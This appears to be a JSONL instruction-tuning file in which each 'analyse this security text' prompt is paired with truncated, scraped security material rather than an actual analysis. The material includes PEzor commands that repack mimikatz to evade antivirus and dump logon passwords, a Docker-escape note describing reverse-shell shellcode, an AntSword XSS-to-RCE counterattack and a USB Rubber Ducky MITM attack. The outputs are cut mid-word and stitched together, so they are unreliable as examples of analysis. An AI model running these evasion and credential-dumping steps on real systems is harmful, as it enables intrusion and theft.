{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 PEzor Bypass AntiVirus 前 安装 常规使 https://iwantmore.pizza/posts/PEzor.html https://iwantmore.pizza/posts/PEzor2.html https://iwantmore.pizza/posts/PEzor3.html docker的kali安装使起来常便快速 复制进去打包完成以后再复制出来 前 安装 常规使 2 参数说明看readme https://github.com/phra/PEzor 常规重打包exe 1 PEzor.sh -format=exe /tmp/m.exe -z 2 -p '\"log c:\\users\\public\\mim i.out\" \"sekurlsa::logonpasswords\" \"exit\"' 3 exe转dll然后反射加载或者侧加载 变成donut形式 1 PEzor.sh -format=reflective-dll /tmp/m.exe -z 2 -p '\"log c:\\users \\public\\m.out\" \"token::whoami\" \"exit\"' 1 2 PEzor.sh -format=dotnet /tmp/m.exe -sleep=2 -z 2 -p '\"log c:\\use rs\\public\\mimi.out\" \"sekurlsa::logonpasswords\" \"exit\"' 3 PEzor.sh -format=dotnet /tmp/m.exe -sleep=2 -z 2 -p ' \"coffee\" ' 4 PEzor.sh -format=dotnet -sleep=1 /tmp/m.exe -z 2 -p '\"log c:\\users \\public\\m.out\" \"token::whoami\" \"exit\"' 4 5", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## uagent (Forensics, 100p) We think we are really cool, are we? [Download](ragent.pcap) ###ENG [PL](#pl-version) We start off with a pcap file, a file is begin downladed throughout some packets, let's export them by filtering them out and using File->Export Objects->Http ![screen1](screen1.png) The packets are generally okay, though we need to delete the first byte from every (except first packet), (the content-ranges mesh with each other with 1 byte) and there are some unnecessary packets at the end. We solve the first problem with a quick script in bash: ```bash for file in `ls extractedFiles` done tail -c +2 $file > ../output/$file; done ``` The only thing that's left is merging the files together, we simply do that with `cat * > out` We're left with a password-protected zip that has out flag.png in it. Another interesting thing is that requests for the zip are made with an interesting User-Agent: ![screen2](screen2.png) We extract the packets using the same techinque as in the first step and are left with a file of base64 encoded strings(be careful to ignore retransmissed packets) Finally, by writing our own script (or just using an online tool like [this one](http://www.motobit.com/util/base64-decoder-encoder.asp)) we convert our strings to an image: ![out](out.png) Using it to open the encrypted zip we get: ![flag](flag.png) There you go! Bonus pic, guessing the flag was not a fun part of the challange: ![guessing](guessing.png) ###PL version", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMachine Duping Pwning Deep Learning Systems CLARENCE CHIO MLHACKER @cchio adapted from Dave Conway HACKING SKILLS MATH & STATS SECURITY RESEARCHER HAX0R DATA SCIENTIST DOING IT ImageNet Google Inc. Google DeepMind UMass, Facial Recognition Nvidia DRIVE Nvidia Invincea Malware Detection System Deep Learning why would someone choose to use it? (Semi)Automated feature/representation learning One infrastructure for multiple problems (sort of) Hierarchical learning: Divide task across multiple layers Efficient, easily distributed & parallelized Definitely not one-size-fits-all softmax function [0.34, 0.57, 0.09] predicted class: 1 correct class: 0 np.argmax logits prediction 풇 hidden layer input layer output layer 푊 activation function bias units 4-5-3 Neural Net Architecture [17.0, 28.5, 4.50] 풇 풇 풇 풇 풇 풇 풇 풇 풇 풇 풇 softmax function [0.34, 0.57, 0.09] predicted class: 1 correct class: 0 np.argmax logits prediction 풇 hidden layer input layer output layer 푊 activation function bias units 4-5-3 Neural Net Architecture [17.0, 28.5, 4.50] 풇 풇 Training Deep Neural Networks Step 1 of 2: Feed Forward 1. Each unit receives output of the neurons in the previous layer (+ bias signal) 2. Computes weighted average of inputs 3. Apply weighted average through nonlinear activation function 4. For DNN classifier, send final layer output through softmax function softmax function [0.34, 0.57, 0.09] logits prediction 풇 푊1 activation function [17.0, 28.5, 4.50] 풇 풇 activation function activation function input 푊2 b1 b2 bias unit bias unit Training Deep Neural Networks Step 2 of 2: Backpropagation 1. If the model made a wrong prediction, calculate the error 1. In this case, the correct class is 0, but the model predicted 1 with 57% confidence - error is thus 0.57 2. Assign blame: trace backwards to find the units that contributed to this wrong prediction (and how much they contributed to the total error) 1. Partial differentiation of this error w.r.t. the units activation value 3. Penalize those units", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Docker Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的可移植的自给自足的容器开发者在电脑上编译测试通过的容器可以批量地在生产环境中部署包括 VMsbare metalOpenStack 集群和其他的基础应用平台 Docker > fofa : app=\"docker-产品\" **相关文章** - [Docker容器安全性分析](https://www.freebuf.com/articles/system/221319.html) - [一些与Docker安全相关的知识点总结与整理](https://mp.weixin.qq.com/s/rKUpyEmurAioiMAFqYzfxg) - [docker build时的安全问题](https://mp.weixin.qq.com/s/LNXyckCjg2uMNPNl0JWHqg) - [容器安全事件排查与响应](https://mp.weixin.qq.com/s/rOOr_wCF4egpV_QlRIbtjQ) **提权检测工具** - [teamssix/container-escape-check](https://github.com/teamssix/container-escape-check) - 用来检测 Docker 容器中的逃逸方法的脚本 ```bash git clone https://github.com/teamssix/container-escape-check.git cd container-escape-check chmod +x container-escape-check.sh ./container-escape-check.sh ``` **相关案例** - [How We Escaped Docker in Azure Functions](https://www.intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/) - [通过Azure Functions提权漏洞实现Dockers逃逸](https://mp.weixin.qq.com/s/6CDbYZh7ChQ_hpuF29tsLA) **Docker 逃逸** - [云原生安全 | docker容器逃逸](https://mp.weixin.qq.com/s/zvHrPwYT77oedXloVJHi8g) - [初识Docker逃逸](https://www.freebuf.com/articles/container/242763.html) - [干货来啦带你初探Docker逃逸](https://www.freebuf.com/company-information/205006.html) - [Docker 逃逸小结第一版](https://paper.seebug.org/1288/) - [容器逃逸方法 - cdxy](https://www.cdxy.me/?p=818) --- ## 内核漏洞导致的逃逸 **[Dirty COW(CVE-2016-5195)](../../OS安全/OS-Exploits.md#linux)** - 漏洞描述 通过 Dirty Cow 漏洞结合 EXP就可以返回一个宿主机的高权限 Shell并拿到宿主机的 root 权限可以直接操作宿主机的文件 VDSO(virtual dvnamic shared object) : 这是一个小型共享库能将内核自动映射到所有用户程序的地址空间 - 举个例子gettimeofday 是一个获取当前时间的函数它经常被用户的程序调用如果一个程序需要知道当前的时间程序就会频繁的轮询为了减少资源开销内核需要把它放在一个所有进程都能访问的内存位置然后通过 VDSO 定义一个功能来共享这个对象让进程来访问此信息通过这种方式调用的时间和资源花销就大大的降低了速度也就变得更快 - 那么如何利用 VDSO 来实现 Docker 逃逸的首先 POC 利用 Dirty Cow 漏洞将 Payload 写到 VDSO 中的一些闲置内存中并改变函数的执行顺序使得在执行正常函数之前调用这个 ShellcodeShellcode 初始化时会检测是否被 root 所调用如果调用则继续执行如果没有调用则返回并执行 clock_gettime 函数接下来它会检测 `/tmp/.X` 文件的存在如果存在则这时已经是 root 权限了然后它会打开一个反向的 TCP 链接为 Shellcode 中填写的 ip 返回一个 Shell,漏洞就这样产生了 - https://www.ichunqiu.com/experime", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: TOML date: 2020-12-29 20:36:35 background: bg-[#848484] tags: - config - format categories: - Programming intro: | This is a quick reference cheat sheet to the TOML format configuration file syntax. plugins: - copyCode --- Getting Started --------------- ### Introduction [TOML](https://toml.io/en/) is a minimal configuration file format that's easy to read due to obvious semantics. - [Document](https://toml.io/en/latest) _(toml.io)_ - [Learn X in Y minutes](https://learnxinyminutes.com/docs/toml/) _(learnxinyminutes.com)_ ### Examples ```toml bool = true date = 2006-05-27T07:32:00Z string = \"hello\" number = 42 float = 3.14 scientificNotation = 1e+12 ``` ### Comments ```yaml # A single line comment example # block level comment example # comment line 1 # comment line 2 # comment line 3 ``` ### Integer ```toml int1 = +42 int2 = 0 int3 = -21 integerRange = 64 ``` ### Float ```toml float2 = 3.1415 float4 = 5e+22 float7 = 6.626e-34 ``` ### Boolean ```toml bool1 = true bool2 = false boolMustBeLowercase = true ``` ### Datetime ```toml date1 = 1989-05-27T07:32:00Z date2 = 1989-05-26T15:32:00-07:00 date3 = 1989-05-27T07:32:00 date4 = 1989-05-27 time1 = 07:32:00 time2 = 00:32:00.999999 ``` ### String ```toml str1 = \"I'm a string.\" str2 = \"You can \\\"quote\\\" me.\" str3 = \"Name\\tJos\\u00E9\\nLoc\\tSF.\" ``` See: [Strings](#toml-strings) ### Table ```toml [owner] name = \"Tom Preston-Werner\" dob = 1979-05-27T07:32:00-08:00 ``` See: [Tables](#toml-tables) ### Array ```toml array1 = [1, 2, 3] array2 = [\"Commas\", \"are\", \"delimiter\"] array3 = [8001, 8001, 8002] ``` ### Friendly Array {.col-span-2} ```toml array1 = [ \"Don't mix\", \"different\", \"types\" ] array2 = [ [ 1.2, 2.4 ], [\"all\", 'strings', \"\"\"are the same\"\"\", '''type'''] ] array3 = [ \"Whitespace\", \"is\", \"ignored\" ] ``` TOML Strings ----- ### Multiline String ```toml multiLineString = \"\"\" Multi-line basic strings are surrounded by three quotation marks on each side and allow newlines. \"\"\" ``` ### Literal String ```toml {.wra", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1210-win-检测到匿名计算机账户更改的使用 ## 来自ATT&CK的描述 攻击者一旦进入网络便可能利用远程服务获得对内部系统的未授权访问当攻击者利用程序服务或操作系统软件或内核本身内的编程错误来执行攻击者控制的代码时就会利用软件漏洞建立立足点后利用远程服务的目标是横向移动以实现对远程系统的访问 攻击者可能需要确定远程系统是否处于易受攻击状态这可以通过网络服务扫描或其他发现方法来完成以寻找在网络中部署的常见易受攻击软件检测或包含远程利用的漏洞或安全软件服务器可能是横向移动中的高价值目标但是如果端点系统提供访问其他资源的方式则端点系统也可能处于危险之中 常见服务例如SMB和RDP以及可能在内部网络例如MySQL和Web服务器服务中使用的应用程序中存在多个众所周知的漏洞 根据易受攻击的远程服务的权限级别攻击者也可能由于横向移动利用而实现对特权升级的利用 ## 测试案例 参考资料如下 <https://www.lares.com/blog/from-lares-labs-defensive-guidance-for-zerologon-cve-2020-1472/> ## 检测日志 windows安全日志 ## 测试复现 暂无 ## 测试留痕 暂无仅提供检测规则相关的日志示例 windows server 2016/win10 EventID4742 ```yml A computer account was changed. Subject: Security ID: ACME\\Administrator Account Name: Administrator Account Domain: ACME Logon ID: 0x27a79 Computer Account That Was Changed: Security ID: S-1-5-21-3108364787-189202583-342365621-1109 Account Name: WS2321$ Account Domain: ACME Changed Attributes: SAM Account Name: - Display Name: - User Principal Name: - Home Directory: - Home Drive: - Script Path: - Profile Path: - User Workstations: - Password Last Set: - Account Expires: - Primary Group ID: - AllowedToDelegateTo: - Old UAC Value: 0x85 New UAC Value: 0x84 User Account Control: Account Enabled User Parameters: - SID History: - Logon Hours: - DNS Host Name: - Service Principal Names: - Additional Information: Privileges: - ``` EventID4624 ```yml An account was successfully logged on. Subject: Security ID: SYSTEM Account Name: DESKTOP-LLHJ389$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 7 Restricted Admin Mode: - Virtual Account: No Elevated Token: No Impersonation Level: Impersonation New Logon: Security ID: AzureAD\\RandyFranklinSmith Account Name: rsmith@montereytechgroup.com Account Domain: AzureAD Logon ID: 0xFD5113F Linked Logon ID: 0xFD5112A Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x30c Process Name: C:\\Windows\\System32\\lsass.exe Network Information: Workstati", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhat is wrong with security? What is wrong with security?  Good security says you shouldnt make assumptions.  Most security products make this same mistake.  This should be called Voodoo security IDS/IPS  They analyze traffic.  They determine good traffic from bad traffic  With signatures written based on a vulnerability.  With samples of known bad traffic.  They do clear cut detection of good from bad, they are incapable of determining intent of traffic. What if?  Pedestrians on the web were not unarmed  Every website got scanned for security vulnerabilities when an indiviaul surfer visits it  Every web surfer has a vulnerability scanner built-in to the browser Introducing  Barrier  Barrier is a vulnerability scanner that is installed in a browser and automatically checks websites for common security vulnerabilities.  This is good for consumers, bad for security companies.  In order to be useful an IDS or IPS will have to determine the intent of the traffic now. Barrier Demo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01 前言 这种反制也只能钓 \"涉世未深\" 的攻击方和一些脚本小子算是蚁剑插件编写不规范造成的RCE 0x02 DHTMLX 在 \\source\\app.entry.js : 行28-57 可以看得见蚁剑在新版加载器中设置了替换函数将对应的特殊 字符替换成实体编码 它调用了dhtmlx框架所以只要是UI渲染的页面都可能存在 XSS->RCE 我把目标盯向了其他插件 0x03 AS_Plug-in 从自带的插件实例的代码开始看: phpinfo 在 行14-22 当中渲染UI框架的时候调用了 unxss 可以知道这个地方不存在XSS漏洞 noxss: (html = '', wrap = true) => { let _html = String(html) .replace(/&/g, \"&amp;\") .replace(/'/g, \"&apos;\") .replace(/>/g, \"&gt;\") .replace(/</g, \"&lt;\") .replace(/\"/g, \"&quot;\"); if (wrap) { _html = _html.replace(/\\n/g, '<br/>'); } return _html; }, /** * unxss * @param {String} html 转义的字符串 * @param {Boolean} wrap 是否反转义换行 * @return {String} 反转义后的字符串 */ unxss: (html = '', wrap = true) => { let _html = String(html) .replace(/&apos;/g, \"'\") .replace(/&gt;/g, \">\") .replace(/&lt;/g, \"<\") .replace(/&quot;/g, '\"') .replace(/&amp;/g, \"&\"); if (wrap) { _html = _html.replace(/<br\\/>/g, '\\n'); // 只替换 noxss 转义过的 } return _html; }, https://github.com/AntSword-Store/phpinfo** https://github.com/AntSword-Store/phpinfo/blob/master/main.js 我们需要用到什么插件 LiveScan 这个是蚁剑判断WEBSHELL存活的一款插件 可以在蚁剑插件中心下载 我从Github找到了这个项目从代码审计这方面开始挖掘漏洞进行反制 core.request({ _: 'phpinfo()' }).then((_ret) => { t.safeHTML(antSword.unxss(_ret['text'])).showLoading(false); toastr.success('获取成功', 'Success'); }).catch((e) => { toastr.error(JSON.stringify(e), 'Error'); t.close(); }); # 插件市场打不开如何解决 https://mp.weixin.qq.com/s/hF3GgZpIcussc-BjUoJUuQ https://github.com/AntSword-Store/LiveScan/blob/master/libs/ui.js // 开始扫描 this.win.win.progressOn(); // 获取 Shell let shells = antSword['ipcRenderer'].sendSync('shell-find', { \"type\": { \"$nin\": [\"custom\"] }, 行160-192 从开始扫描到渲染UI每一步他都没有调用JS替换函数: unxss , onxss 于是我构思如何让他扫描后渲染出来它扫描时shell不需要存活于是我们shell地址开始下手 Windows对文件的命名有标准我们没法使用尖括号 只能在链接的时候修改 \"category\": { \"$nin\": [\".Trash\"] } }); // 传递给扫描核心代码 callback({ shells: shells }).then((ret) => { // 解析扫描结果 let griddata = []; this.gridData = ret; ret.map((item, i) => { // console.debug(i, item); if (!item) { return }; griddata.push({ id: item.id, data: [i, item.shell, LANG['", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThreat Data Visualization Steve Ginty Brandon Dixon July 18th 2013 Verisign Confidential 2 Verisign Confidential and Proprietary  Identify the problem  Discuss the solution  Walk through use targeted attack use case  Identify caveats  Conclusion Overview and Agenda 3 Verisign Confidential and Proprietary  Attacks and the data associated with them are ever increasing  Security organizations are now collecting more data than analyst can triage  Multiple databases with separate UIs to query  Passive DNS data  WHOIS Data  Malware Repository  Open Source Intelligence  How do you sift through terabytes of domains, IP addresses, malware strings, assembly code and network PCAPs to find that one indicator driving the next attack? The Problem 4 Verisign Confidential and Proprietary  Leverage a data visualization product to actively query multiple data sources quickly and connect nodes.  Serves as analysis suite  Significantly expedites data processing  Focus analyst effort on information that matters  Many graph-based problems in security  iDefense has chosen to use Patervas Maltego software to act as a visualization.  Use open source transforms to expedite  Develop custom transforms to access internal and external systems  Automate repeatable processes through the use of machines The Solution 5 Verisign Confidential and Proprietary  iDefense identifies a malicious file using the following domain for C&C:  itsec.eicp.net  Dynamic DNS domain resolving to over 800 IP addresses  Over 500 Second level domain associations  Manually sifting through all this data would take an extreme amount of analyst effort Targeted Attack Case Study 6 Verisign Confidential and Proprietary The old way  Command Line Scripting  Excel  Text Files 7 Verisign Confidential and Proprietary Data Visualization  First Level Connections 8 Verisign Confidential and Proprietary Data Visualization  Second Level Connections 9 Verisign Confidential and Proprietary Data Visualization  Weighted Graph 10 Verisign Co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe future is present, here and now. But to see it, you must fly. Richard Thieme leads you to the edge of a cliff... and gives you a push. New ways of thinking emerge during free fall. Identities diverge, shapes change, and questions linger long after you put down this astonishing book. Mind Games provides wings. Risk the trip. Youll never be merely human again.  The depth, complexity, and texture of Richard Thiemes thought processes break the mold.  Brian Snow, Senior Technical Director, NSA (ret)  Thiemes ability to communicate complex, abstract concepts and personalize them is like verbal origami.  Jeff Moss, Director, Black Hat, a division of TechWeb/United Business Media, and a member of the DHS HSAC  Silent Emergent, Doubly Dark is ... very imaginative writing, with a complex- ity that raises [the story] to the fringes of slipstream. Were left wondering whats real and whats not ....  Steven Pirie, The Future Fire  Beautiful descriptions and intriguing concepts ...  The Fix (UK)  The reader is left reeling, dizzy with insight.  Robin Roberts, Information Security R&D, CIA (ret) Richard Thieme is a true digital renaissance man. He used the early Internet to reach thousands of global readers who dubbed him a member of the cyber avant-garde (CNN), a father figure for online culture, (London Sunday Tele- graph), a keen observer (Le Monde) and one of the most creative minds of the digital generation (CTHEORY). He has delighted audiences with topics such as creativity, security and professional intelligence in a time of radical change, biohacking, the transformation of spirituality and religion, and UFOlogy 101. Humans are a funny species. Nineteen Stories of Brave New Worlds and Alternate Realities", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCastGuard Joe Bialek  Microsoft Offensive Research & Security Engineering (MORSE) Twitter: @JosephBialek Problem Space Killing Bugs vs. Killing Exploit Techniques Mitigating exploit techniques has ambiguous long-term value. Mitigations are typically far enough away from actual bug that bugs are still exploitable using different techniques. Tradeoffs between performance, compatibility, and mitigation durability are becoming increasingly difficult. Unclear how many more practical opportunities there are for building meaningful exploit mitigations. Killing Bugs vs. Killing Exploit Techniques Microsoft increasingly focused on eliminating vulnerability classes, removing attack surface, and sandboxing code. Hyper-V vPCI component refactored from a C kernel component to C++ (w/ GSL) user component. Microsoft investigation of Rust and other safer systems languages, and use of managed languages. CLFS blocked from sandboxes, Redirection Guard, etc. Path Forward for C/C++ Code Four high-level bug classes responsible for majority of memory safety vulnerabilities. Buffer Overflow & Out-of-Bounds Accesses (i.e. attacker controls array index) Uninitialized Memory Type Confusion Use-After-Free Path Forward for C/C++ Code Four high-level bug classes responsible for majority of memory safety vulnerabilities. Buffer overflow / out-of-bounds accesses (spatial safety) Uninitialized memory Type confusion Use-after-free Memory Tagging? / CHERI? InitAll / Zeroing Allocators Memory Tagging? / CHERI? / Application Specific Solutions (MemGC) ??? Not necessarily things Microsoft is committed to using, just illustrating solution space. Type Confusion Come in many flavors.. Illegal static downcast (down-casting to the wrong derived type in a class hierarchy). Improper union use. Illegal reinterpret_cast (i.e. cast an object of some type to totally different type). Generic logic issues (i.e. using fields incorrectly). Offer extremely powerful primitives to attackers and can often lead to breaking", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNCC Group 2021. All rights reserved Sleight of ARM: Demystifying Intel Houdini Brian Hong @im_eningeer whoami  NCC Group 2021. All rights reserved Brian S. Hong (@im_eningeer)  Hardware Enthusiast  Forward Reverse Engineer  Like to reverse low-level stuff and break embedded systems  Android Penetration Testing  Security Consultant @  Cooper Union Electrical Engineering Introduction  Android NDK  NCC Group 2021. All rights reserved 1 https://gs.statcounter.com/os-market-share/mobile/worldwide 2 https://www.android-x86.org/  Android is the operating system powering 70%1 of the mobile devices  Android supports application development in Java and Kotlin, and additionally in native languages such as C and C++ through the Native Development Kit (NDK)  ARM is the main hardware platform for Android, with official support for x86 introduced in later versions  Android Lollipop (2014)  NDK r6 (2011) added support for x86  NDK r10 (2014) added support for 64 bit ABIs, including x86_64  There is also out-of-tree support for Android on x86  Android-x86 (2011)2 Introduction  Android on x86  NCC Group 2021. All rights reserved  Two main kinds of x86 devices running Android (neither of them are phones)  x86 Chromebooks  Commercial Android emulators on x86 hosts  x86 support is generally lacking across apps  ARM is the primary target platform  If shipping native code, the Play Store only requires ARM builds  Few developers end up shipping x86 binaries for their APKs, but many apps have native code  So then how are x86 Android devices supposed to support popular apps (optimized with native ARM code)? Houdini  What is it?  NCC Group 2021. All rights reserved  Intels proprietary dynamic binary translator from ARM to x86  Co-created by Google for Android  Enables ARM native applications to run on x86 based platforms  A black box shrouded in mystery  Little mention of it on Intels websites, seemingly not a public-facing product  No public documentation  Several vendors may be obfuscating ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Art of Software Security Assessment - Identifying and Preventing Software Vulnerabilities The Art of Software Security Assessment - Identifying and Preventing Software Vulnerabilities 1 目录 1. The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities .... 6 2. Table of Contents ............................................................................................................................. 8 3. Copyright ....................................................................................................................................... 12 4. About the Authors ......................................................................................................................... 14 4.1 Preface ................................................................................................................................. 14 5. Acknowledgments ......................................................................................................................... 18 6. Part I: Introduction to Software Security Assessment ................................................................ 18 6.1 Chapter 1. Software Vulnerability Fundamentals ............................................................. 18 6.1.1 Introduction .............................................................................................................. 18 6.1.2 Vulnerabilities ........................................................................................................... 19 6.1.3 The Necessity of Auditing ......................................................................................... 24 6.1.4 Classifying Vulnerabilities ......................................................................................... 29 6.1.5 Common Threads ...................................................................................................... 32 6.1.6 Summary .....................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVoIP Wars : Return of the SIP Fatih Özavcı Security Consultant @ Sense of Security (Australia) www.senseofsecurity.com.au @fozavci 2 # whois  Security Consultant @ Sense of Security (Australia)  10+ Years Experience in Penetration Testing  800+ Penetration Tests, 40+ Focused on NGN/VoIP  SIP/NGN/VoIP Systems Penetration Testing  Mobile Application Penetration Testing  IPTV Penetration Testing  Regular Stuff (Network Inf., Web, SOAP, Exploitation...)  Author of Viproy VoIP Penetration Testing Kit  Author of Hacking Trust Relationships Between SIP Gateways  Blackhat Arsenal USA 2013  Viproy VoIP Pen-Test Kit  So, that's me Viproy in Action http://www.youtube.com/watch?v=1vDTujNVKGM 4 # traceroute  VoIP Networks are Insecure, but Why?  Basic Attacks  Discovery, Footprinting, Brute Force  Initiating a Call, Spoofing, CDR and Billing Bypass  SIP Proxy Bounce Attack  Fake Services and MITM  Fuzzing Servers and Clients, Collecting Credentials  (Distributed) Denial of Service  Attacking SIP Soft Switches and SIP Clients, SIP Amplification Attack  Hacking Trust Relationships of SIP Gateways  Attacking SIP Clients via SIP Trust Relationships  Fuzzing in Advance  Out of Scope  RTP Services and Network Tests, Management  Additional Services  XML/JSON Based Soap Services 5 # info  SIP  Session Initiation Protocol  Only Signalling, not for Call Transporting  Extended with Session Discovery Protocol  NGN  Next Generation Network  Forget TDM and PSTN  SIP, H.248 / Megaco, RTP, MSAN/MGW  Smart Customer Modems & Phones  Easy Management  Security is NOT a Concern?!  Next Generation! Because We Said So! 6 # SIP Services : Internal IP Telephony INTERNET SIP Server Support Servers SIP Clients Factory/Campus SIP over VPN Commercial Gateways Analog/Digital PBX 7 # SIP Services : Commercial Services INTERNET Soft Switch (SIP Server) VAS, CDR, DB Servers MSAN/MGW PSTN/ISDN Distributed MPLS 3rd Party Gateways SDP Servers Customers RTP, Proxy Servers Mobile 8 # Administrators Think... Root Doe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUSB Attack to Decrypt Wi-Fi Communications Presented by: Jeremy Dorrough Disclaimer Opinions expressed in this presentation are my own. I am speaking for myself, not Genworth, nor anyone else. Image Source: iwishisaidthat.com About Me  10+ years in IT Security industry  Worked in defense, utility & financial sectors  Currently a Network Security Engineer at Genworth  I crash cars for fun Presentation Outline USB Rubber Ducky How the Attack Works Keyboard Payload Mass Storage/Keyboard Payload Demo Questions USB Rubber Ducky Image Source: http://hakshop.myshopify.com/ Firmware Options  Duck  Keyboard Input  FAT Duck  Mass Storage Device  Detour Duck  Multiple Payloads  Twin Duck  Both Keyboard and Mass Storage Device Teensy https://github.com/adamcaudill/Psychson How The Attack Works How The Attack Works How The Attack Works Social Engineer??? DHS Study Performed by idappcom:  60% Plugged in dropped USB device  90% Plugged in USB device if case had an official logo http://www.bloomberg.com/news/articles/2011-06-27/human-errors-fuel-hacking-as-test-shows-nothing-prevents-idiocy Image Source: www.qualitylogoproducts.com The Cat and Mouse Game  Anti-Virus  Web filters/Proxy  FTP whitelist  HTTP Strict Transport Security (HSTS) Setup Rogue AP  Hostapd  dnsmasq  Iptables  Alternatively use mana-toolkit Setup MITM Listener  Configure a proxy of your choice  Burpsuite, Squid, SSLStrip, Mallory, etc.  Export the certificate  Convert the certificate to base64 encoding -----BEGIN CERTIFICATE----- MIICxDCCAi2gAwIBAgIEVOdW+zANBgkqhkiG9w0BAQUFADCBijEUMBIGA1UEBhML UG9ydFN3aWdnZXIxFDASBgNVBAgTC1BvcnRTd2lnZ2VyMRQwEgYDVQQHEwtQb3J0 U3dpZ2dlcjEUMBIGA1( )gQWBBTSJrL4vz7JJPJ67CNmrwAnfuTs0zANBgkqhkiG9w0B AQUFAAOBgQCBMulw4WP++I76bfvXQ4RAgNo0DYiasfw4SniawhnfpDE4spV1vjzf IbQQVcetDdnCvSB6YVE0Rv3HQbTZE5r170dOvl4o6Yr3wgFF9sUUqQq+M/Z4wRgg 8OJPgC8PXCmkelAO166m4w7h3DlnQj1cGNdQr5AmMksvEmDvioTz0A== -----END CERTIFICATE----- Burpsuite Proxy Settings Payload Summary 1. Bypass UAC and open CMD.exe 2. Cre", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\njava-安全编码规范-1.0.1 java-安全编码规范-1.0.1 编写依据与参考文件 1.信息安全技术 应用软件安全编程指南国标 GBT38674-2020 2.国家电网公司网络和信息安全反违章措施-安全编码二十条信通技术2014117 号 3.国家电网公司应用软件系统通用安全要求企标 Q_GDW 1597-2015 4.Common Weakness Enumeration - 国际通用计算机软件缺陷字典 5.OWASP Top 10 2017 - 2017年十大Web 应用程序安全风险 6.fortify - 代码审计规则 7.java开发手册阿里巴巴出品 第一条 设计开发必须符合公司架构设计及安全防护方案 项目程序的设计开发必须在公司的SG-EA架构设计指导下开展在开发实施过程中必须严格遵 循安全防护方案中的相关安全措施 第二条 上线代码必须进行严格的安全测试并进行软著备案 所有系统上线前代码应进行严格的安全自测及第三方安全测试并进行软件著作权备案确保 上线代码与测试代码的一致 第三条 严格限制帐号访问权限 账号权限设置应基于帐号角色赋予其相应权限并遵循权限最小化独立原则应确保账号 权限分离不交叉不可变更 第四条 提供完备的安全审计功能 必须提供必备的安全审计功能对系统的帐号权限操作做到在线监控违规告警和事后审计 并具备防误操作防篡改及备份机制确保用户操作轨迹可定位可追溯 第五条 采取有效措施保证认证安全 认证模块应符合公司网络与信息系统安全管理办法中对帐号口令强度要求并包含防暴力破解 机制同时重要外网业务系统如具备手机绑定功能需对绑定信息进行认证以避免恶意绑定 造成用户敏感信息泄露 第六条 保证代码简洁注释明确 应使用结构化的编程语言避免使用递归和Go to声明同时应去除程序冗余功能代码 第七条 使用安全函数及接口 在程序中禁止采用被证实有缺陷的不安全函数或接口并需要检查数据长度及缓冲区边界 第八条 必须验证所有外部输入 必须对所有外部输入进行验证包括用户的业务数据输入及其它来自于外部程序接口之间的 数据输入并对输入信息中的特殊字符进行安全检测和过滤 第十条 避免内存溢出 在对缓存区填充数据时应进行边界检查必须判断是否超出分配的空间 HTTP参数污染 不受信任的Content-Type请求头 不受信任的HOST请求头 不受信任的查询字符串 不受信任的HTTP请求头 不受信任的http请求头Referer 不受信任的http请求头User-Agent Cookie中的潜在敏感数据 不受信任的命令注入 不安全的反序列化 配置全局反序列化白名单 jackson编码示例 fastjson编码示例 服务器端请求伪造 正则表达式DOSReDOS XML外部实体XXE攻击 XStream安全编码规范 XPath注入 EL表达式代码注入 未经验证的重定向 Spring未验证的重定向 不安全的对象绑定 针对js脚本引擎的代码注入 JavaBeans属性注入 跨站脚本攻击XSS 第九条 必须过滤上传文件 必须检查上传文件的类型名称等并使用正则表达式等对文件名做严格的检查限定文件名 只能包括字母和数字同时限制文件的操作权限并对文件的访问路径进行验证 潜在的路径遍历读取文件 潜在的路径遍历写入文件 第十一条 确保多线程编程的安全性 确保在多线程编程中正确的访问共享变量避免多个线程同时修改一个共享变量 竞争条件 第十二条 设计错误异常处理机制 应设计并建立防止系统死锁的机制及异常情况的处理和恢复机制避免程序崩溃 第十三条 数据库操作使用参数化请求方式 对需要使用SQL语句进行的数据库操作必须通过构造参数化的SQL语句来准确的向数据库指 出哪些应该被当作数据避免通过构造包含特殊字符的SQL语句进行SQL注入等攻击 SQL注入 Mybatis安全编码规范 LDAP注入 第十四条 禁止在源代码中写入口令服务器IP等敏感信息 应将加密后的口令服务器IP加密密钥等敏感信息存储在配置文件数据库或者其它外部数 据源中禁止将此类敏感信息存储在代码中 硬编码密码 硬编码密钥 第十五条 为所有敏感信息采用加密传输 